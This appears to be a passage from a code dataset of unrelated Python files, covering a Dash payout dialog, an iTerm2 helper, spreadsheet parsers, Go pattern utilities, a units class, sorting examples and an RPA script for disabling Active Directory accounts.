ctrl.dlg_config_fun(dlg_title=\"Loading unspent transaction outputs...\", show_message=True,\n show_progress_bar=False)\n ctrl.display_msg_fun('Loading unspent transaction outputs. 
Please wait...')\n addresses = []\n for a in self.utxos_source:\n if a[0] and a[0] not in addresses:\n addresses.append(a[0])\n\n if len(addresses):\n self.utxos = self.dashd_intf.getaddressutxos(addresses)\n\n try:\n # for each utxo read block time\n for utxo in self.utxos:\n blockhash = self.dashd_intf.getblockhash(utxo.get('height'))\n bh = self.dashd_intf.getblockheader(blockhash)\n utxo['time_str'] = datetime.datetime.fromtimestamp(bh['time']).strftime(DATETIME_FORMAT)\n\n # for a given utxo dash address find its bip32 path\n found = False\n for a in self.utxos_source:\n if a[0] == utxo['address']:\n utxo['bip32_path'] = a[1]\n found = True\n break\n if not found:\n raise Exception('UTXO address mismatch')\n\n except Exception as e:\n self.errorMsg(str(e))\n\n except DashdIndexException as e:\n self.errorMsg(str(e))\n\n except Exception as e:\n self.errorMsg('Error occurred while calling getaddressutxos method: ' + str(e))\n","sub_path":"src/send_payout_dlg.py","file_name":"send_payout_dlg.py","file_ext":"py","file_size_in_byte":16704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"394847593","text":"#!/usr/bin/env python3\n\nimport iterm2\nimport sys\n\n_, TITLE, SESSION_ID, CMD = sys.argv\n\ndef find_session(window):\n for tab in window.tabs:\n for session in tab.sessions:\n if session.session_id == SESSION_ID:\n return session\n\n\nasync def main(connection):\n app = await iterm2.async_get_app(connection)\n window = app.current_terminal_window\n session = find_session(window)\n \n if session is None:\n tab = await window.async_create_tab()\n session = tab.current_session\n await session.async_set_name(TITLE)\n else:\n await session.async_activate()\n # Ctrl+C\n await session.async_send_text('\\003')\n\n await session.async_send_text('{}\\n'.format(CMD))\n print(session.session_id)\n \niterm2.run_until_complete(main)\n","sub_path":"scripts/run-in-iterm.py","file_name":"run-in-iterm.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"620993208","text":"import pandas as pd\nfrom xlsxmetadata.metadata import get_sheet_names\nfrom io import BytesIO\nfrom openpyxl import load_workbook\nimport re\n\n\ndef prep_givens_file(givens_file):\n sought = ['Brampton', 'Chesapeake','Plainfield','Reno','Hope']\n adj_sought = [x + ' Adjustments' for x in sought]\n keep_columns = givens_columns()\n\n frames = pd.read_excel(givens_file, sheet_name=None, converters={\"ORDER #'s\":str})\n\n flat_names = [x for x in frames if x in sought]\n adj_names = [x for x in frames if x in adj_sought]\n all_names = flat_names + adj_names\n\n frames = {k: v for k, v in frames.items() if k in all_names}\n\n flat_frames = []\n adj_frames = []\n\n for name, df in frames.items():\n df.columns = df.iloc[5]\n df = df.drop(labels=range(6), axis=0)\n\n if name in flat_names:\n df = df.dropna(thresh=12)\n df['location'] = name\n df = df[[*list(keep_columns.keys())]]\n df = df.rename(keep_columns, axis='columns')\n flat_frames.extend(df.to_dict(orient='records'))\n\n elif name in adj_names:\n df = df.dropna(thresh=4)\n df['location'] = name.replace('Adjustments','').strip()\n df = df[[*list(keep_columns.keys())]]\n df = df.rename(keep_columns, axis='columns')\n adj_frames.extend(df.to_dict(orient='records'))\n\n return (flat_frames, adj_frames)\n\n\ndef givens_columns():\n return {\n 'LOAD NUMBER': 'load_number',\n \"ORDER #'s\": 'order_numbers',\n 'SHIP DATE': 'ship_date',\n 
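# maps the raw spreadsheet headers (taken from row 6 of each sheet) to snake_case record keys\n        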
'CARRIER': 'carrier',\n        'TOTAL': 'total'\n    }\n\n\ndef prep_freight_report(freight_report):\n\n    keep_columns = freight_report_columns()\n    frames = pd.read_excel(freight_report, sheet_name=None)\n\n    records = []\n    for k, df in frames.items():\n        df = df[[*list(keep_columns.keys())]]\n        df = df.rename(keep_columns, axis='columns')\n        records.append(df)\n\n    return pd.concat(records).to_dict(orient='records')\n\n\ndef freight_report_columns():\n    return {\n        'MM': 'month',\n        'YY': 'year',\n        'Pick Ticket': 'pick_ticket',\n        'Order': 'order_number',\n        'Doc#': 'document_number',\n        'Sales': 'sales',\n        'Cost': 'cost',\n        'Freight Sales': 'freight_sales',\n        'Freight Cost': 'freight_cost',\n        'Carrier#': 'carrier_number',\n        'Name': 'carrier',\n        'Company': 'company',\n        'Tracking Number': 'tracking_number',\n        'Original Pick Ticket 1': 'original_pick_ticket'\n    }\n","sub_path":"app/src/preppers/file_prep.py","file_name":"file_prep.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"419641327","text":"\"\"\"\npattern_util.py\nUtility functions for rule based simulations.\n\"\"\"\n\nimport numpy as np\nfrom pattern import pat3set\nimport random\n\nfrom board_util import GoBoardUtil, EMPTY, PASS, BORDER\n\n\nclass PatternUtil(object):\n\n    @staticmethod\n    def neighborhood_33(board, point):\n        \"\"\"\n        Get the pattern around point.\n        Returns\n        -------\n        patterns :\n        Set of patterns in the same format of what michi pattern base provides. Please refer to pattern.py to see the format of the pattern.\n        \"\"\"\n        positions = [point-board.NS-1, point-board.NS, point-board.NS+1,\n                     point-1, point, point+1,\n                     point+board.NS-1, point+board.NS, point+board.NS+1]\n\n        pattern = \"\"\n        for d in positions:\n            if board.board[d] == board.current_player:\n                pattern += 'X'\n            elif board.board[d] == GoBoardUtil.opponent(board.current_player):\n                pattern += 'x'\n            elif board.board[d] == EMPTY:\n                pattern += '.'\n            elif board.board[d] == BORDER:\n                pattern += ' '\n        return pattern\n\n    @staticmethod\n    def generate_pattern_moves(board):\n        \"\"\"\n        Generate a list of moves that match pattern.\n        This only checks moves that are neighbors of the moves in the last two steps.\n        See last_moves_empty_neighbors() in simple_board for detail.\n        \"\"\"\n        color = board.current_player\n        pattern_checking_set = board.last_moves_empty_neighbors()\n        moves = []\n        for p in pattern_checking_set:\n            if (PatternUtil.neighborhood_33(board, p) in pat3set):\n                assert p not in moves\n                assert board.board[p] == EMPTY\n                moves.append(p)\n        return moves\n    \n    @staticmethod\n    def filter_moves_and_generate(board, moves, check_selfatari):\n        \"\"\"\n        Move filter function.\n        \"\"\"\n        color = board.current_player\n        while len(moves) > 0:\n            candidate = random.choice(moves)\n            if PatternUtil.filter(board, candidate, color, check_selfatari):\n                moves.remove(candidate)\n            else:\n                return candidate\n        return None\n    \n    @staticmethod\n    def filter_moves(board, moves, check_selfatari):\n        color = board.current_player\n        good_moves = []\n        for move in moves:\n            if not PatternUtil.filter(board,move,color,check_selfatari):\n                good_moves.append(move)\n        return good_moves\n    \n    # return True if move should be filtered\n    @staticmethod\n    def filleye_filter(board, move, color):\n        assert move != None\n        return not board.is_legal(move, color) or board.is_eye(move, color)\n    \n    # return True if move should be filtered\n    @staticmethod\n    def selfatari_filter(board, move, color):\n        return ( PatternUtil.filleye_filter(board, move, color)\n                 
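# a move is filtered when it is illegal, fills our own eye, or would leave the moved block in self-atari\n                 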
or PatternUtil.selfatari(board, move, color)\n )\n \n # return True if move should be filtered\n @staticmethod\n def filter(board, move, color, check_selfatari):\n if check_selfatari:\n return PatternUtil.selfatari_filter(board, move, color)\n else:\n return PatternUtil.filleye_filter(board, move, color)\n\n @staticmethod\n def selfatari(board, move, color):\n max_old_liberty = PatternUtil.blocks_max_liberty(board, move, color, 2)\n if max_old_liberty > 2:\n return False\n cboard = board.copy()\n # swap out true board for simulation board, and try to play the move\n isLegal = cboard.play_move(move, color)\n if isLegal:\n new_liberty = cboard._liberty(move, color)\n if new_liberty==1:\n return True\n return False\n \n @staticmethod\n def blocks_max_liberty(board, point, color, limit):\n assert board.board[point] == EMPTY\n max_lib = -1 # will return this value if this point is a new block\n neighbors = board._neighbors(point)\n for n in neighbors:\n if board.board[n] == color:\n num_lib = board._liberty(n, color)\n if num_lib > limit:\n return num_lib\n if num_lib > max_lib:\n max_lib = num_lib\n return max_lib\n \n @staticmethod\n def generate_move_with_filter(board, use_pattern, check_selfatari):\n \"\"\"\n Arguments\n ---------\n check_selfatari: filter selfatari moves?\n Note that even if True, this filter only applies to pattern moves\n use_pattern: Use pattern policy?\n \"\"\"\n move = None\n if use_pattern:\n moves = PatternUtil.generate_pattern_moves(board)\n move = PatternUtil.filter_moves_and_generate(board, moves,\n check_selfatari)\n if move == None:\n move = GoBoardUtil.generate_random_move(board, board.current_player,False) #do not filter eye-filling moves.\n return move\n \n @staticmethod\n def generate_all_policy_moves(board, pattern, check_selfatari):\n \"\"\"\n generate a list of policy moves on board for board.current_player.\n Use in UI only. 
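Returns the list of candidate moves together with a short label naming the policy that produced them. 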
For playing, use generate_move_with_filter\n which is more efficient\n \"\"\"\n if pattern:\n pattern_moves = []\n pattern_moves = PatternUtil.generate_pattern_moves(board)\n pattern_moves = PatternUtil.filter_moves(board, pattern_moves, check_selfatari)\n if len(pattern_moves) > 0:\n return pattern_moves, \"Pattern\"\n return GoBoardUtil.generate_random_moves(board, True), \"Random\"\n \n @staticmethod\n def playGame(board, color, **kwargs):\n \"\"\"\n Run a simulation game according to give parameters.\n \"\"\"\n komi = kwargs.pop('komi', 0)\n limit = kwargs.pop('limit', 1000)\n random_simulation = kwargs.pop('random_simulation',True)\n use_pattern = kwargs.pop('use_pattern',True)\n check_selfatari = kwargs.pop('check_selfatari',True) # always false\n if kwargs:\n raise TypeError('Unexpected **kwargs: %r' % kwargs)\n nuPasses = 0\n for _ in range(limit):\n color = board.current_player\n if random_simulation:\n move = GoBoardUtil.generate_random_move(board,color,True)\n else:\n move = PatternUtil.generate_move_with_filter(board,use_pattern,check_selfatari)\n board.play_move(move, color)\n if move == PASS:\n nuPasses += 1\n else:\n nuPasses = 0\n if nuPasses >= 2:\n break\n winner = board.get_final_result() # gogui-final-result.\n return winner\n","sub_path":"pattern_util.py","file_name":"pattern_util.py","file_ext":"py","file_size_in_byte":6870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"208096285","text":"# Submitter: shambhut(Thapa, Shambhu)\n# Partner: timotjk1(Kim, Timothy)\n\n# We certify that we worked cooperatively on this programming\n# assignment, according to the rules for pair programming\n\nfrom goody import type_as_str\nfrom math import sqrt\n\n\nclass DimensionError(Exception):\n def __init__(self,message=None):\n Exception.__init__(self,message)\n\n\nclass Dimensional:\n \n #static functions\n \n\n \n def __init__(self,grav, l = 0, m = 0, t = 0):\n self.grav = grav \n self.m = m \n self.l = l \n self.t = t\n \n \n assert type(self.l) ==int and type(self.m) == int and type(self.t) == int\n \n \n \n def __bool__(self):\n \n return self.grav > 0 \n \n def __len__(self):\n return abs(self.l) + abs(self.m) + abs(self.t)\n \n def __repr__(self):\n result = \"Dimensional({},\".format(self.grav)\n\n\n if self.l != 0:\n result += \"l={},\".format(self.l)\n \n if self.m != 0:\n result += \"m={},\".format(self.m)\n \n if self.t != 0:\n result += \"t={},\".format(self.t)\n \n result = result[:-1] + \")\"\n \n return result\n \n \n def __str__(self):\n \n \n return \"{}({},{},{})\".format(self.grav,self.l,self.m, self.t)\n \n def __getitem__(self,index):\n if index not in [ 'value', 'l', 'm', 't', 'd']:\n raise KeyError\n \n if index == 'value':\n return self.grav\n elif index == 'l':\n return self.l\n \n elif index == 'm':\n return self.m\n \n elif index == 't':\n return self.t\n elif index == 'd':\n return (self.l , self.m, self.t)\n \n def format(self, iter):\n res='{}'.format(self.grav)\n if self.l==0 and self.m==0 and self.t==0:\n return res\n \n res+=' '\n \n if self.l>0:\n res+=iter[0]\n if self.l>1:\n res+='**{}'.format(self.l)\n if self.m>0:\n res+=iter[1]\n if self.m>1:\n res+='**{}'.format(self.m)\n if self.t>0:\n res+=iter[2]\n if self.t>1:\n res+='**{}'.format(self.t)\n \n \n if self.l<=0 and self.m<=0 and self.t<=0:\n res+='1'\n \n if self.l<0 or self.m<0 or self.t<0:\n res+='/'\n if self.l<0:\n res+=iter[0]\n if self.l<-1:\n res+='**{}'.format(abs(self.l))\n if self.m<0:\n res+=iter[1]\n if self.m<-1:\n 
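# an exponent below -1 becomes an explicit power after the '/' separator\n                    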
res+='**{}'.format(abs(self.m))\n            if self.t<0:\n                res+=iter[2]\n                if self.t<-1:\n                    res+='**{}'.format(abs(self.t))\n\n        return res\n    \n\n    \n    def __pos__(self):\n        return Dimensional(self.grav, self.l,self.m, self.t)\n    \n    def __neg__(self):\n        return Dimensional(self.grav * -1, self.l ,self.m , self.t)\n    \n    def __add__(self,other):\n        \n        if type(other) not in [int, float, Dimensional ]:\n            raise TypeError(\"type did not match \")\n        \n        \n        if type(other) == Dimensional and ( self.l != other.l or self.m != other.m or self.t != other.t) :\n            raise DimensionError\n        elif type(other) != Dimensional and (self.l!=0 or self.m!=0 or self.t!=0) :\n            raise DimensionError\n        elif type(other) == Dimensional and self.l == other.l and self.m == other.m and self.t == other.t : \n            \n            return Dimensional(self.grav + other.grav,self.l, self.m,self.t)\n        \n        if (type(other) in [int, float]) and self.l == 0 and self.m == 0 and self.t == 0 : \n            \n            return Dimensional(self.grav + other)\n        \n    def __radd__(self, left):\n        return self.__add__(left)\n    \n    def __sub__(self, other):\n        return self + (-other)\n    \n    def __rsub__(self, other):\n        return -(self-other)\n\n    def __mul__(self, other):\n        \n        if type(other) not in [int, float,Dimensional ]:\n            raise TypeError(\"type did not match \")\n        \n        if type(other) == Dimensional: \n            return Dimensional(self.grav * other.grav, self.l+other.l, self.m+other.m,self.t+other.t)\n        \n        if type(other) in [int, float]: \n            \n            return Dimensional(self.grav * other, self.l, self.m, self.t)\n        \n    def __rmul__(self, other):\n        return (self*other) \n    \n    def __truediv__(self, other):\n#        return self * (other**-1)\n        if type(other) not in [int, float,Dimensional ]:\n            raise TypeError(\"type did not match \")\n        \n        if type(other) == Dimensional: \n            \n            return Dimensional(self.grav / other.grav, self.l-other.l, self.m-other.m,self.t-other.t)\n        \n        if (type(other) in [int, float]): \n            \n            return Dimensional(self.grav/ other, self.l,self.m, self.t)\n        else:\n            raise DimensionError\n        \n    def __rtruediv__(self,other):\n        if type(other) not in [int, float, Dimensional]:\n            raise TypeError('Type did not match')\n        return Dimensional(other/self.grav, 0-self.l, 0-self.m, 0-self.t)\n    \n    def __pow__(self, other):\n        if not type(other) in [int, Dimensional]:\n            raise TypeError('must be int, Dimensional')\n        if type(other)== Dimensional and (len(other))>0:\n            raise DimensionError('Cannot be Dimensional with dimensions not equal to 0')\n        if not type(other) == int:\n            return Dimensional(self.grav**other.grav, self.l*other.grav, self.m*other.grav, self.t*other.grav)\n        \n        return Dimensional(self.grav**other, self.l*other, self.m*other, self.t*other)\n    \n    def __eq__(self, other):\n        if type(other) in [float, int]:\n            return self.grav==other\n        if type(other) == Dimensional and ( self.l != other.l or self.m != other.m or self.t != other.t) :\n            raise DimensionError('dimensions values must equal each other')\n        \n        return str(self)==str(other)\n    \n    def sqrt(self):\n        if all([self.l%2==0, self.m%2==0, self.t%2==0]):\n            return Dimensional(self.grav**(0.5), int(self.l/2), int(self.m/2), int(self.t/2))\n        else:\n            raise DimensionError('dimensions must be even')\n    \n    def __abs__(self):\n        return Dimensional(abs(self.grav), self.l, self.m, self.t)\n\n\n    def __lt__(self, other):\n        \n        if type(other) in [float, int]:\n            return self.grav < other\n        if type(other) == Dimensional and self.l == other.l and self.m == other.m and self.t == other.t : \n            return self.grav < other.grav\n        else:\n            raise DimensionError('Dimension values must equal')\n    \n    def __gt__(self, other):\n        \n        if type(other) in [float, int]:\n            return self.grav > other\n        if type(other) == Dimensional and self.l == other.l and self.m == other.m and self.t == other.t : \n            return self.grav > other.grav\n        else:\n            raise DimensionError('Dimension values must equal')\n    \n    def __le__(self,other):\n        \n        
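# a <= b holds exactly when a < b or a == b; like __lt__, it is defined only when the dimensions match\n        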
if type(other) in [ Dimensional, int, float]:\n            return self < other or self == other\n        \n        if type(other) == Dimensional and self.l == other.l and self.m == other.m and self.t == other.t : \n            return self.grav < other.grav or self.grav == other.grav\n        else:\n            raise DimensionError('Dimension values must equal')\n    \n    def __ge__(self,other):\n        \n        if type(other) in [ Dimensional, int, float]:\n            return self > other or self == other\n        \n    def __setattr__(self, k, v):\n        assert 'grav' not in self.__dict__ or 'l' not in self.__dict__ or 'm' not in self.__dict__ or 't' not in self.__dict__,(\"cannot set the attribute: it already exists\")\n        \n        self.__dict__[k] = v\n    \n    \n    \n\nif __name__ == '__main__':\n    # You can put your own code to test Dimensional here; for example\n#    t = Dimensional(2.5,t=1)\n#    g = Dimensional(9.8,l=1,t=-2)\n#    d = .5*g*t**2\n#    print(d.format(\"mgs\"))\n    dless = Dimensional(5)\n    1 + dless #6(0,0,0)\n    1. + dless #6.0(0,0,0)\n    g = Dimensional(9.8,1,0,-2)\n    \n    Dimensional(10,2,0,-2).sqrt()\n\n    \n    \n    #driver tests\n    import driver\n    driver.default_file_name = 'bsc2.txt'\n#    driver.default_show_exception = True\n#    driver.default_show_exception_message = True\n#    driver.default_show_traceback = True\n    driver.driver()\n    \n","sub_path":"workspace/program2/dimensional.py","file_name":"dimensional.py","file_ext":"py","file_size_in_byte":8749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"105389889","text":"#!/usr/bin/env python3\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# ====================\n# Embedding Dimensions\n# ====================\nndim = np.array([25, 50, 100, 200, 300])\nword2vec = np.array([83.120, 82.190, 83.463, 83.507, 83.525])\nglove = np.array([82.253, 82.782, 83.115, 83.457, None])\n\n# plt.title(\"GloVe vs word2vec\")\nplt.xlabel(\"# of embedding dimensions\")\nplt.ylabel(\"% Accuracy\")\n\naxes = plt.gca()\naxes.set_ylim([80, 86])\n#axes.set_xlim([0,100])\n\nline_word2vec = plt.plot(ndim, word2vec, label=\"word2vec\", marker='o')\nline_glove = plt.plot(ndim, glove, label=\"glove\", marker='o')\n\nplt.legend(loc='lower right')\nplt.grid()\n\nplt.savefig(\"embedding_dim.png\")\n\n","sub_path":"cnn_text/plots/plot_embedding_dim.py","file_name":"plot_embedding_dim.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"132221872","text":"\"\"\"\nIdea : extract minimum element then swap it with element at index 0, then at index 1, ...\nkeep the left portion of the list sorted. (actually, at ith step the first i elements are sorted.)\nReminder: Bubble sort keeps the right portion of the list sorted, comparing and swapping consecutive pairs.\n\"\"\"\n\ndef selection_sort(L):\n    \"\"\"\n    Assumes L is a list of integers\n    Mutates L so that it is sorted\n    \"\"\"\n    for i in range(len(L)-1):\n        print('sorting', L)\n        shortest = i\n        for j in range(i+1, len(L)):\n            if L[j] < L[shortest]:\n                shortest = j # remember the shortest element\n        if shortest != i:\n            L[i], L[shortest] = L[shortest], L[i] # swap ith element with the shortest element\n\ndef selection_sort2(L):\n    \"\"\"\n    Assumes L is a list of integers\n    Mutates L so that it is sorted\n    Suffix is the right-side unsorted list, prefix is the left-side sorted list.\n    \"\"\"\n    suffixSt = 0\n    while suffixSt != len(L): # suffixSt is the starting index of suffix. 
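Loop invariant: L[:suffixSt] is sorted and no element of it exceeds any element of the suffix. 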
O(len(L))\n        print('sorting', L)\n        for i in range(suffixSt, len(L)): # O(len(L))\n            if L[i] < L[suffixSt]:\n                L[suffixSt], L[i] = L[i], L[suffixSt]\n        suffixSt += 1\n\nL = [2, 4, 1, 6, 5, 7, 9, 8, 3]\nselection_sort(L)\nprint()\nL = [2, 4, 1, 6, 5, 7, 9, 8, 3]\nselection_sort2(L)","sub_path":"Python/SelectionSort.py","file_name":"SelectionSort.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"653815737","text":"#!/usr/bin/env python\n# functional tests file --> imitates user activity\nfrom unittest import skip # decorator for skipping tests\nfrom .base import FunctionalTest\n\n\nclass LayoutAndStylingTest(FunctionalTest):\n\n    @skip\n    def test_layout_and_styling(self):\n        # Aśka visits the page:\n        self.browser.get(self.server_url)\n        self.browser.set_window_size(1024, 768)\n\n        # she notices a nicely centered form:\n        inputbox = self.get_item_input_box()\n        self.assertAlmostEqual(inputbox.location['x'] +\n                               inputbox.size['width'] / 2, 512, delta=5)\n","sub_path":"functional_tests/test_layout_and_styling.py","file_name":"test_layout_and_styling.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"230649789","text":"import datetime\r\nfrom datetime import datetime\r\nfrom pyPythonRPA.Robot import pythonRPA\r\nimport pyautogui\r\nimport wmi\r\nfrom pyautogui import*\r\n\r\nimport win32api\r\nimport win32con\r\nimport time\r\n\r\nkeys = {\r\n    \"left\" : win32con.VK_LEFT,\r\n    \"right\" : win32con.VK_RIGHT,\r\n    \"up\" : win32con.VK_UP,\r\n    \"down\" : win32con.VK_DOWN,\r\n    \"shift\" : win32con.VK_SHIFT\r\n}\r\n\r\ndef press_key(key, delay=0.1):\r\n    if key in keys:\r\n        win32api.keybd_event(keys[key], 0, win32con.KEYEVENTF_EXTENDEDKEY, 0)\r\n        pythonRPA.keyboard.press(\"down\", 10)\r\n        time.sleep(delay)\r\n        win32api.keybd_event(keys[key], 0, win32con.KEYEVENTF_KEYUP, 0)\r\n    else:\r\n        print(\"KEY NOT AVAILABLE\")\r\n\r\npress_key(\"shift\", 5)\r\npythonRPA.keyboard.press(\"Shift\")\r\ndef block(names,log_table):\r\n    # start Active Directory\r\n    pythonRPA.keyboard.press('win + R')\r\n    Run = pythonRPA.bySelector([{\"title\": \"Run\", \"backend\": \"win32\"}])\r\n    Run.wait_appear(2)\r\n    pythonRPA.keyboard.write('dsa.msc')\r\n    pythonRPA.keyboard.press('Enter')\r\n\r\n    # clicking the SEARCH button to open the search window\r\n    AD_main = pythonRPA.bySelector(\r\n        [{\"title\": \"Active Directory Users and Computers\", \"class_name\": \"MMCMainFrame\", \"backend\": \"win32\"}])\r\n    AD_main.wait_appear(5)\r\n    AD_main.set_focus()\r\n    AD_main.maximize()\r\n    print(\"Active Directory opened well!\")\r\n\r\n    #Action click\r\n    pyautogui.click(62, 36)\r\n    #change_domain click\r\n    while 1:\r\n        try:\r\n            x, y = pyautogui.locateCenterOnScreen(r'.\\Utils\\change_domain.png')\r\n            pyautogui.click(x, y)\r\n            print('change domain clicked!')\r\n            pythonRPA.sleep(2)\r\n            break\r\n        except Exception as e:\r\n            print(e)\r\n    pythonRPA.keyboard.press('Enter')\r\n    pythonRPA.sleep(2)\r\n    # # click hcsbk\r\n    # pythonRPA.keyboard.press('down')\r\n    # pythonRPA.sleep(2)\r\n    # pythonRPA.keyboard.press('Enter')\r\n    while 1:\r\n        try:\r\n            x, y = pyautogui.locateCenterOnScreen(r'.\\Utils\\hcsbk.png')\r\n            pyautogui.doubleClick(x, y)\r\n            pythonRPA.sleep(2)\r\n            print('clicked hcsbk well!')\r\n            break\r\n        except Exception as e:\r\n            print(e)\r\n\r\n    while 1:\r\n        try:\r\n            x, y = pyautogui.locateCenterOnScreen(r'.\\Utils\\SEARCH.png')\r\n            
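# locateCenterOnScreen either raises or returns None while the template image is absent (unpacking None also throws), so the bare except simply retries until the button appears\r\n            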
pyautogui.doubleClick(x, y)\r\n            break\r\n        except Exception as e:\r\n            print(e)\r\n    find_users = pythonRPA.bySelector(\r\n        [{\"title\": \"Find Users, Contacts, and Groups\", \"class_name\": \"#32770\", \"backend\": \"win32\"}])\r\n    find_users.wait_appear(2)\r\n    find_users.set_focus()\r\n    find_users.maximize()\r\n\r\n    for name in names:\r\n        try:\r\n            # log_ad_status = \"Success\"\r\n            # log_ad_comment = \"\"\r\n            success = 0\r\n            # searching the accounts by full names\r\n            if name != None and name == 'test test test':\r\n                search_by_name = pythonRPA.bySelector(\r\n                    [{\"title\": \"Find Users, Contacts, and Groups\", \"class_name\": \"#32770\", \"backend\": \"win32\"},\r\n                     {\"ctrl_index\": 152},{\"ctrl_index\": 7}])\r\n                clear_button = pythonRPA.bySelector(\r\n                    [{\"title\": \"Find Users, Contacts, and Groups\", \"class_name\": \"#32770\", \"backend\": \"win32\"},\r\n                     {\"ctrl_index\": 14}])\r\n                clear_button.click()\r\n                pythonRPA.keyboard.press('Enter')\r\n                search_by_name.wait_appear(1)\r\n                search_by_name.click()\r\n                pythonRPA.keyboard.write(name)\r\n                pythonRPA.sleep(1)\r\n                search_ok = pythonRPA.bySelector(\r\n                    [{\"title\": \"Find Users, Contacts, and Groups\", \"class_name\": \"#32770\", \"backend\": \"win32\"},\r\n                     {\"ctrl_index\": 12}])\r\n                search_ok.click()\r\n                pythonRPA.sleep(3)\r\n                # clicking the result\r\n                found = False\r\n                for i in range(5):\r\n                    try:\r\n                        x,y = pyautogui.locateCenterOnScreen(r'.\\Utils\\found.PNG')\r\n                        found = True\r\n                        break\r\n                    except Exception as e:\r\n                        print(e)\r\n\r\n                if found:\r\n                    x = 178\r\n                    y = 340\r\n                    pyautogui.rightClick(x, y)\r\n\r\n                    # disable the account\r\n                    for i in range(5):\r\n                        try:\r\n                            a,b = pyautogui.locateCenterOnScreen(r'.\\Utils\\enable_condition.png')\r\n                            for i in range(4):\r\n                                pythonRPA.keyboard.press('down')\r\n                            print(a,b)\r\n                            pythonRPA.keyboard.press('Enter')\r\n                            pythonRPA.sleep(1)\r\n                            pythonRPA.keyboard.press('Enter')\r\n                            is_enable = True\r\n                            break\r\n                        except: continue\r\n\r\n                    #\r\n                    success += 1\r\n                    print(success)\r\n\r\n                    # Remove the account's group memberships\r\n                    # open the Properties dialog\r\n                    pyautogui.rightClick(x, y)\r\n                    pythonRPA.keyboard.press('up arrow')\r\n                    pythonRPA.sleep(1)\r\n                    pythonRPA.keyboard.press('Enter')\r\n                    pythonRPA.sleep(3)\r\n\r\n                    name_variants = get_profile_name(name)\r\n                    for i in range(len(name_variants)):\r\n                        try:\r\n                            user_profile = pythonRPA.bySelector(\r\n                                [{\"title\":name_variants[i] + \" Properties\", \"class_name\": \"#32770\", \"backend\": \"win32\"}])\r\n                            user_profile.set_focus()\r\n                            name = name_variants[i]\r\n                            break\r\n                        except Exception as e:\r\n                            print(e)\r\n\r\n                    while 1:\r\n                        try:\r\n                            x, y = pyautogui.locateCenterOnScreen(r'.\\Utils\\member_of.png')\r\n                            pyautogui.doubleClick(x, y)\r\n                            break\r\n                        except Exception as e:\r\n                            print(e)\r\n                    domain_sub_group = pythonRPA.byImage(r'.\\Utils\\domain_users.png')\r\n\r\n                    n = 0\r\n\r\n                    while 1:\r\n                        try:\r\n                            sub_group = pythonRPA.bySelector(\r\n                                [{\"title\": name + \" Properties\", \"class_name\": \"#32770\", \"backend\": \"win32\"},\r\n                                 {\"ctrl_index\": 17}, {\"ctrl_index\": 2}])\r\n                            sub_group.wait_appear(1)\r\n                            sub_group.click()\r\n                            pythonRPA.keyboard.press('up')\r\n                            press_key(\"shift\", 5)\r\n                            pythonRPA.keyboard.press(\"Shift\")\r\n                            remove_button = pythonRPA.bySelector(\r\n                                [{\"title\": name + \" Properties\", \"class_name\": \"#32770\", \"backend\": \"win32\"},\r\n                                 {\"ctrl_index\": 0},\r\n                                 {\"ctrl_index\": 4}])\r\n                            remove_button.click()\r\n                            pythonRPA.keyboard.press('left')\r\n                            pythonRPA.sleep(1)\r\n                            pythonRPA.keyboard.press('Enter')\r\n                            warning = pythonRPA.bySelector(\r\n                                [{\"title\": \"Active Directory Domain 
Services\", \"class_name\": \"#32770\", \"backend\": \"win32\"}])\r\n if (warning.is_exists()):\r\n pythonRPA.keyboard.press('Enter')\r\n ok = pythonRPA.bySelector([{\"title\":name+\" Properties\",\"class_name\":\"#32770\",\"backend\":\"win32\"},{\"ctrl_index\":12}])\r\n ok.click()\r\n pythonRPA.keyboard.press('Enter')\r\n except Exception as e:\r\n pythonRPA.keyboard.press('Enter')\r\n break\r\n success += 1\r\n print(success)\r\n\r\n # move this account to th blocked accounts\r\n find_users.set_focus()\r\n find_users.maximize()\r\n clear_button = pythonRPA.bySelector(\r\n [{\"title\": \"Find Users, Contacts, and Groups\", \"class_name\": \"#32770\", \"backend\": \"win32\"},\r\n {\"ctrl_index\": 14}])\r\n clear_button.click()\r\n pythonRPA.keyboard.press('Enter')\r\n search_by_name.wait_appear(1)\r\n search_by_name.click()\r\n pythonRPA.keyboard.write(name)\r\n pythonRPA.sleep(1)\r\n search_ok = pythonRPA.bySelector(\r\n [{\"title\": \"Find Users, Contacts, and Groups\", \"class_name\": \"#32770\", \"backend\": \"win32\"},\r\n {\"ctrl_index\": 12}])\r\n search_ok.click()\r\n pythonRPA.sleep(3)\r\n\r\n # clicking the result\r\n x = 178\r\n y = 340\r\n pyautogui.rightClick(x, y)\r\n search_by_name.wait_appear(1)\r\n search_by_name.click()\r\n pyautogui.rightClick(x, y)\r\n for i in range(6):\r\n pythonRPA.keyboard.press('down arrow')\r\n pythonRPA.keyboard.press('Enter')\r\n pythonRPA.sleep(1)\r\n move_to_block = pythonRPA.bySelector([{\"title\": \"Move \", \"class_name\": \"#32770\", \"backend\": \"win32\"}])\r\n move_to_block.wait_appear(1)\r\n move_to_block.set_focus()\r\n for i in range(10):\r\n pythonRPA.keyboard.press('down arrow')\r\n pythonRPA.keyboard.press('Enter')\r\n print(name, 'Account added to BLOCK sucsessfully !')\r\n pythonRPA.sleep(1)\r\n success += 1\r\n print(success)\r\n if success == 3:\r\n log_table.append([name, \"Active Directory\", \"Заблокирован\", \"\", datetime.now().strftime(\"%H:%M:%S\")])\r\n else:\r\n log_table.append([name, \"Active Directory\", \"Не заблокирован\", \"Сотрудник не найден в системе\", datetime.now().strftime(\"%H:%M:%S\")])\r\n except Exception as e:\r\n log_table.append([name, 